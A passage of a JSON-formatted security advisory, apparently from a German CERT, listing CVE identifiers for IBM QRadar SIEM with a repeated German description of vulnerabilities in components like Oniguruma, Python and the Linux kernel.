"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2019-16163"
},
{
"cve": "CVE-2019-19012",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2019-19012"
},
{
"cve": "CVE-2019-19203",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2019-19203"
},
{
"cve": "CVE-2019-19204",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2019-19204"
},
{
"cve": "CVE-2019-8675",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2019-8675"
},
{
"cve": "CVE-2019-8696",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2019-8696"
},
{
"cve": "CVE-2020-10001",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2020-10001"
},
{
"cve": "CVE-2020-27783",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2020-27783"
},
{
"cve": "CVE-2020-3898",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2020-3898"
},
{
"cve": "CVE-2021-33631",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2021-33631"
},
{
"cve": "CVE-2021-43618",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2021-43618"
},
{
"cve": "CVE-2021-43818",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2021-43818"
},
{
"cve": "CVE-2021-43975",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2021-43975"
},
{
"cve": "CVE-2022-26691",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-26691"
},
{
"cve": "CVE-2022-28388",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-28388"
},
{
"cve": "CVE-2022-3545",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-3545"
},
{
"cve": "CVE-2022-3594",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-3594"
},
{
"cve": "CVE-2022-3640",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-3640"
},
{
"cve": "CVE-2022-36402",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-36402"
},
{
"cve": "CVE-2022-38096",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-38096"
},
{
"cve": "CVE-2022-38457",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-38457"
},
{
"cve": "CVE-2022-40133",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-40133"
},
{
"cve": "CVE-2022-40982",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-40982"
},
{
"cve": "CVE-2022-41858",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-41858"
},
{
"cve": "CVE-2022-42895",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-42895"
},
{
"cve": "CVE-2022-45869",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-45869"
},
{
"cve": "CVE-2022-45884",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-45884"
},
{
"cve": "CVE-2022-45887",
"notes": [
{
"category": "description",
